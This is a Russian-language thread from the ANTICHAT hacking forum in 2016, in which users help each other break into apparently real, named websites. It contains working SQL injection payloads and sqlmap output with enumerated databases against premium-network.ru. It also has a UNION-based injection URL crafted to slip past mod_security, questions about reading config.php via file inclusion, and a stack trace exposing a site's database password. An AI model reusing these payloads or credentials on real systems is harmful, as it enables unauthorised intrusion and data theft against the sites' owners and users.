ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
26.08.2016, 15:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
33728
Репутация:
14
|
|
Сообщение от MaxxWell
MaxxWell said:
↑
http://sirus.su/in.php
Что можно извлечь полезного ? sirus.su?robots.txt?file=config.php можно ли так прочитать данный файл, где то я видел видео на эту тему. LFI через phpinfo() разве что.
но нужен инклуд.
|
|
|
|
26.08.2016, 15:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
9612
Репутация:
0
|
|
Сообщение от pw0ned
pw0ned said:
↑
LFI через phpinfo() разве что.
но нужен инклуд. А где ж его взять то?))
|
|
|
|
26.08.2016, 16:47
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906
Репутация:
-5
|
|
Имеется сайт site.ru/ajax/Areas/Product/
Если в cookies поставить ' в timezone, то выдает следующее:
.SpoilerTarget" type="button">Spoiler: Ответ HTTP 500:
Код:
Code:
Exception Object
(
[message:protected] => DateTimeZone::__construct(): Unknown or bad timezone (')
[string:Exception:private] =>
[code:protected] => 0
[file:protected] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
[line:protected] => 164
[trace:Exception:private] => Array
(
[0] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
[line] => 164
[function] => __construct
[class] => DateTimeZone
[type] => ->
[args] => Array
(
[0] => '
)
)
[1] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
[line] => 141
[function] => checkConnect
[class] => MYSQL_DB
[type] => ->
[args] => Array
(
)
)
[2] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
[line] => 74
[function] => __construct
[class] => MYSQL_DB
[type] => ->
[args] => Array
(
[0] => site_work
[1] => 01cNWgm3qbNeRWn6uHMUzOPI3CRVJZJ
[2] => satom
[3] => 127.0.0.1
[4] => 3307
)
)
[3] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/model/DefaultModel.class.php
[line] => 75
[function] => DB
[class] => MYSQL_DB
[type] => ::
[args] => Array
(
)
)
[4] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/model/MailQueueModel.class.php
[line] => 22
[function] => __construct
[class] => DefaultModel
[type] => ->
[args] => Array
(
[0] => mail_queue
)
)
[5] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/oop/mail/QueueMailer.class.php
[line] => 39
[function] => __construct
[class] => MailQueueModel
[type] => ->
[args] => Array
(
)
)
[6] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/oop/SendMail.class.php
[line] => 56
[function] => send
[class] => QueueMailer
[type] => ->
[args] => Array
(
[0] => errors@site.com
[1] => Timezone Error
[2] =>
Здесь может быть sql-injection или это просто вывод ошибки такой? |
|
|
26.08.2016, 16:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
9612
Репутация:
0
|
|
Как подобрать если не выводит кол-во?
Код:
Code:
http://www.premium-network.ru/index.php?id=-tariffs_internet%27+order+by+100+--+
|
|
|
|
26.08.2016, 17:48
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906
Репутация:
-5
|
|
Сообщение от MaxxWell
MaxxWell said:
↑
Как подобрать если не выводит кол-во?
Код:
Code:
http://www.premium-network.ru/index.php?id=-tariffs_internet%27+order+by+100+--+
Попробуй другой URL))
Код:
Code:
http://www.premium-network.ru/index.php?id=add&used=faq&s=3
.SpoilerTarget" type="button">Spoiler: подсказка
Код:
Code:
---
Parameter: s (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=add&used=faq&s=3' AND 9304=9304 AND 'HJyF'='HJyF
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=add&used=faq&s=3' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176706a71,(SELECT (ELT(3147=3147,1))),0x7171786271,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'xSeN'='xSeN
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=add&used=faq&s=3' AND SLEEP(5) AND 'PmOg'='PmOg
---
web server operating system: FreeBSD
web application technology: PHP 5.4.26, Apache 2.2.27
back-end DBMS: MySQL >= 5.5
banner: '5.5.37'
current user: 'forumpt@localhost'
current database: 'new_premium'
current user is DBA: False
database management system users [1]:[*] 'forumpt'@'localhost'
available databases [3]:[*] forumpt[*] information_schema[*] new_premium
|
|
|
|
26.08.2016, 17:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
33728
Репутация:
14
|
|
Сообщение от kacergei
kacergei said:
↑
Имеется сайт site.ru/ajax/Areas/Product/
Если в cookies поставить
'
в timezone, то выдает следующее:
Spoiler: Ответ HTTP 500:
Код:
Code:
Exception Object
(
[message:protected] => DateTimeZone::__construct(): Unknown or bad timezone (')
[string:Exception:private] =>
[code:protected] => 0
[file:protected] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
[line:protected] => 164
[trace:Exception:private] => Array
(
[0] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
[line] => 164
[function] => __construct
[class] => DateTimeZone
[type] => ->
[args] => Array
(
[0] => '
)
)
[1] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
[line] => 141
[function] => checkConnect
[class] => MYSQL_DB
[type] => ->
[args] => Array
(
)
)
[2] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
[line] => 74
[function] => __construct
[class] => MYSQL_DB
[type] => ->
[args] => Array
(
[0] => site_work
[1] => 01cNWgm3qbNeRWn6uHMUzOPI3CRVJZJ
[2] => satom
[3] => 127.0.0.1
[4] => 3307
)
)
[3] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/model/DefaultModel.class.php
[line] => 75
[function] => DB
[class] => MYSQL_DB
[type] => ::
[args] => Array
(
)
)
[4] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/model/MailQueueModel.class.php
[line] => 22
[function] => __construct
[class] => DefaultModel
[type] => ->
[args] => Array
(
[0] => mail_queue
)
)
[5] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/oop/mail/QueueMailer.class.php
[line] => 39
[function] => __construct
[class] => MailQueueModel
[type] => ->
[args] => Array
(
)
)
[6] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/oop/SendMail.class.php
[line] => 56
[function] => send
[class] => QueueMailer
[type] => ->
[args] => Array
(
[0] => errors@site.com
[1] => Timezone Error
[2] =>
Здесь может быть sql-injection или это просто вывод ошибки такой? Ошибка скрипта вроде как.
|
|
|
|
26.08.2016, 18:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
6685
Репутация:
0
|
|
Код:
Code:
http://site.ru/news-post.php?id=-1'+/*!50000Union*/+Select+1,schema_name,3,4,5,6+From+/*!information_schema.schemata+limit+0,2*/+--+sp
стоит mod_security, выводит только 1 базу, с таблицами также! добавлял limit и group_concat, таже фигня mod_security не ругается, что может быть?
version:
5.5.42-37.1-log |
|
|
|
26.08.2016, 22:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от MaxxWell
MaxxWell said:
↑
http://sirus.su/in.php
Что можно извлечь полезного ? sirus.su?robots.txt?file=config.php можно ли так прочитать данный файл, где то я видел видео на эту тему. можно исходники читать
|
|
|
|
26.08.2016, 22:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
9612
Репутация:
0
|
|
Сообщение от BabaDook
BabaDook said:
↑
можно исходники читать В пм пожалуйста можешь описать в кратце как??
|
|
|
|
27.08.2016, 02:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
9612
Репутация:
0
|
|
Всё уже.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
